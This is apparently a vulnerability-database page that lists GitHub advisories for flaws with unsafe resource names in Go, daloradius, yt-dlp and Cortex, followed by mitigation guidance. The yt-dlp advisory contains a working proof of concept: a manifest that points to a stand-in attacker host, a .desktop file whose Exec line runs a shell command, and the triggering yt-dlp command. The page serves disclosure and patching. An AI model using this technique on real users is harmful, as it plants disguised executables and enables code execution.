      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47173"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-5W89-2C2X-6X66

Vulnerability from github – Published: 2026-04-08 03:32 – Updated: 2026-07-09 15:31
VLAI
Details

SWIG file names containing 'cgo' and well-crafted payloads could lead to code smuggling and arbitrary code execution at build time due to trust layer bypass.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-27140"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-641",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-08T02:16:02Z",
    "severity": "HIGH"
  },
  "details": "SWIG file names containing \u0027cgo\u0027 and well-crafted payloads could lead to code smuggling and arbitrary code execution at build time due to trust layer bypass.",
  "id": "GHSA-5w89-2c2x-6x66",
  "modified": "2026-07-09T15:31:57Z",
  "published": "2026-04-08T03:32:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27140"
    },
    {
      "type": "WEB",
      "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-27140.json"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2026-4871"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
    },
    {
      "type": "WEB",
      "url": "https://go.dev/issue/78335"
    },
    {
      "type": "WEB",
      "url": "https://go.dev/cl/763768"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456341"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-27140"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:34099"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:25182"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:23246"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16698"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16697"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16694"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16498"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16497"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16494"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16024"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:16021"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:10704"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:10219"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:10217"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9RW8-HQCQ-VXH4

Vulnerability from github – Published: 2023-01-04 12:30 – Updated: 2023-01-10 21:30
VLAI
Details

Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-0046"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-641"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-04T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch.",
  "id": "GHSA-9rw8-hqcq-vxh4",
  "modified": "2023-01-10T21:30:33Z",
  "published": "2023-01-04T12:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0046"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lirantal/daloradius/commit/2013c2d1231e99dac918247b69b198ded1f30a1c"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/2214dc41-f283-4342-95b1-34a2f4fea943"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C6MH-FPJC-4PR3

Vulnerability from github – Published: 2026-06-16 20:59 – Updated: 2026-06-16 20:59
VLAI
Summary
yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)
Details

Summary

A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.

While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

Proof of Concept

1. Start a malicious server: Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:

#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"

And host the payload.desktop file with malicious content:

[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle

2. Trigger the download: In this case, the generic extractor triggers the exploit if the --write-subs option is used:

yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"

Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.

Patches

yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.

Workarounds

It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.

Users who are not able to upgrade should do ALL of the following:

  • Only pass fully trusted input URLs to yt-dlp
  • Do not use the --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, or --embed-thumbnail options
  • Use --format - to interactively select download formats and validate their file extensions
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 2026.06.09"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "yt-dlp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.6.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50023"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-641"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T20:59:42Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nA vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as `.desktop`, `.url`, `.webloc`) to the user\u0027s filesystem, bypassing the remediation for `CVE-2024-38519`. \n\n### Details\nThe fix for `CVE-2024-38519` enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as `.exe` or `.sh`) during file downloads. However, this allowlist explicitly included the unsafe extensions `.desktop`, `.url`, and `.webloc` so that the functionality of the `--write-link` option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.\n\nNumerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an `EXT-X-MEDIA:TYPE=SUBTITLES` tag with a malicious URI (e.g., `URI=\"http://attacker/x.desktop\"`), which would result in yt-dlp writing the attacker-controlled content to a file with a `.desktop` extension if the user had passed the `--write-subs` option.\n\nWriting OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments. \n\nWhile these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a \"subtitles\"/media file, leading to a phishing attack or arbitrary code execution.\n\n### Proof of Concept\n**1. Start a malicious server:**\nHost a malicious `master.m3u8` manifest that points to malicious subtitle payloads:\n```m3u8\n#EXTM3U\n#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID=\"subs\",NAME=\"English\",URI=\"http://attacker/payload.desktop\",LANGUAGE=\"en\"\n```\nAnd host the `payload.desktop` file with malicious content:\n```ini\n[Desktop Entry]\nType=Application\nExec=sh -c \"touch /tmp/ytdlp_pwned_$(id -u)\"\nName=Subtitle\n```\n\n**2. Trigger the download:**\nIn this case, the generic extractor triggers the exploit if the `--write-subs` option is used:\n```bash\nyt-dlp --write-subs -o \"MyVideo.%(ext)s\" \"http://attacker/master.m3u8\"\n```\n\n**Result:** yt-dlp writes `MyVideo.en.desktop` to disk, containing the attacker payload.\n\n### Patches\nyt-dlp version 2026.06.09 fixes this issue by removing `.url`, `.desktop` and `.webloc` from the global file extension allowlist, and by only allowing those file types to be written from within the context of the `--write-link` options\u0027 functionality.\n\n### Workarounds\nIt is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.\n\nUsers who are not able to upgrade should do ALL of the following:\n\n- Only pass fully **trusted** input URLs to yt-dlp\n- Do not use the `--write-subs`, `--write-auto-subs`, `--embed-subs`, `--write-thumbnail`, `--write-all-thumbnails`, or `--embed-thumbnail` options\n- Use `--format -` to interactively select download formats and validate their file extensions",
  "id": "GHSA-c6mh-fpjc-4pr3",
  "modified": "2026-06-16T20:59:42Z",
  "published": "2026-06-16T20:59:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-c6mh-fpjc-4pr3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38519"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp/commit/e578e265f7c6ca94a74b30e0d8d6196a4d19fb6a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/yt-dlp/yt-dlp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2026.06.09.230517"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp/releases/tag/2026.06.09"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)"
}

GHSA-CQ2G-PW6Q-HF7J

Vulnerability from github – Published: 2022-12-19 21:09 – Updated: 2023-10-02 11:04
VLAI
Summary
Cortex's Alertmanager can expose local files content via specially crafted config
Details

Impact

A local file inclusion vulnerability exists in Cortex versions v1.13.0, v1.13.1 and v1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the Alertmanager Set Configuration API. Only users of the Cortex Alertmanager service using -experimental.alertmanager.enable-api or enable_api: true are affected.

Specific Go Packages Affected

github.com/cortexproject/cortex/pkg/alertmanager

Patches

Affected Cortex users are advised to upgrade to versions 1.13.2 or 1.14.1.

Workarounds

Patching is ultimately advised. Using out-of-bound validation, Cortex administrators may reject Alertmanager configurations containing the api_key_file setting in the opsgenie_configs section and opsgenie_api_key_file in the global section before sending to the Set Alertmanager Configuration API as a workaround.

References

  • Fixed Versions:
  • https://github.com/cortexproject/cortex/releases/tag/v1.14.1
  • https://github.com/cortexproject/cortex/releases/tag/v1.13.2
  • https://cortexmetrics.io/docs/api/#set-alertmanager-configuration

For more information

If you have any questions or comments about this advisory:

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cortexproject/cortex"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.14.0"
            },
            {
              "fixed": "1.14.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.14.0"
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cortexproject/cortex"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.13.0"
            },
            {
              "fixed": "1.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-23536"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-641",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-12-19T21:09:05Z",
    "nvd_published_at": "2022-12-19T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nA local file inclusion vulnerability exists in Cortex versions v1.13.0, v1.13.1 and v1.14.0, where a malicious actor could remotely read local files as a result of parsing maliciously crafted Alertmanager configurations when submitted to the [Alertmanager Set Configuration API](https://cortexmetrics.io/docs/api/#set-alertmanager-configuration). Only users of the Cortex Alertmanager service using `-experimental.alertmanager.enable-api` or `enable_api: true` are affected.\n\n### Specific Go Packages Affected\ngithub.com/cortexproject/cortex/pkg/alertmanager\n\n### Patches\nAffected Cortex users are advised to upgrade to versions 1.13.2 or 1.14.1.\n\n### Workarounds\nPatching is ultimately advised. Using out-of-bound validation, Cortex administrators may reject Alertmanager configurations containing the `api_key_file` setting in the `opsgenie_configs` section and `opsgenie_api_key_file` in the `global` section before sending to the [Set Alertmanager Configuration API](https://cortexmetrics.io/docs/api/#set-alertmanager-configuration) as a workaround.\n\n### References\n- Fixed Versions:\n   - https://github.com/cortexproject/cortex/releases/tag/v1.14.1\n   - https://github.com/cortexproject/cortex/releases/tag/v1.13.2\n- https://cortexmetrics.io/docs/api/#set-alertmanager-configuration\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [cortex](https://github.com/cortexproject/cortex/issues/new/choose)\n* Email us at [cortex-team@googlegroups.com](mailto:cortex-team@googlegroups.com).\n",
  "id": "GHSA-cq2g-pw6q-hf7j",
  "modified": "2023-10-02T11:04:41Z",
  "published": "2022-12-19T21:09:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cortexproject/cortex/security/advisories/GHSA-cq2g-pw6q-hf7j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23536"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cortexproject/cortex/commit/03e023d8b012887b31cc268d0d011b01e1e65506"
    },
    {
      "type": "WEB",
      "url": "https://cortexmetrics.io/docs/api/#set-alertmanager-configuration"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cortexproject/cortex"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cortexproject/cortex/releases/tag/v1.13.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cortexproject/cortex/releases/tag/v1.14.1"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2022-1175"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Cortex\u0027s Alertmanager can expose local files content via specially crafted config"
}

Mitigation
Architecture and Design

Do not allow users to control names of resources used on the server side.

Mitigation
Architecture and Design

Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them.

Mitigation
Architecture and Design

Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed.

No CAPEC attack patterns related to this CWE.